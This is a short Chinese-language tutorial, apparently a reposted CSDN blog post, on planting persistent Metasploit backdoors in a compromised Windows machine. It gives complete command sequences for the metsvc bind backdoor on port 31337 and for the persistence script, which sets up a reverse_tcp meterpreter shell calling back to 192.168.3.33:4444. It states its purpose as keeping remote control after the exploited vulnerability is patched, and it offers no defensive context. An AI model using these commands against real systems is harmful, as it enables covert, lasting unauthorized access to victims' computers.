metasploit永久后门

metasploit永久后门简介

  • 利用漏洞获取的meterpreter shell 运行于内存中,重启失效。
  • 重复利用exploit 漏洞可能造成程序崩溃
  • 持续永久后门保证漏洞修复后仍可以远程控制

metsvc永久后门

1.生成metsvc后门

run metsvc -A

     

2.启用侦听模块,设置指定metsvc_bind_tcp payload(metsvc默认侦听端口31337)

use exploit/multi/handler

set payload windows/metsvc_bind_tcp

3.设置目标端口

set lport 31337

4.设置目标ip地址

set rhost 192.168.3.44

5.运行侦听模块

run

persistence永久后门

1.查看帮助信息

run persistence -h

2.生成永久后门,设置反弹ip及端口。

run persistence -X -i 10 -p 4444 -r  192.168.3.33

3.使用侦听模块,使用reverse_tcp payload。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

4.设置回连ip地址。

set lhost 192.168.3.33

5.运行侦听模块。

run

到此就完成了metasploit永久后门的介绍,如果想了解更多的Kali工具,请关注我!

猜你喜欢

转载自blog.csdn.net/smli_ng/article/details/106347001